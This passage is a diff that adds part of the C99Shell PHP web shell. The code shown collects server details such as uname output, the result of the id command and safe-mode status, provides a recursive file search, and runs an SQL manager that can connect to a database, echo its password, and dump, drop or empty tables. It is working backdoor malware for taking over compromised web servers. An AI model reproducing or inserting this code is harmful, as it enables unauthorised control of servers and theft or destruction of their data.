+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return false;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== false)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = true;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = false;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === false) {$free = 0;}
+ if ($total === false) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+}
+echo "<br>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = false;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = true;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = false;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
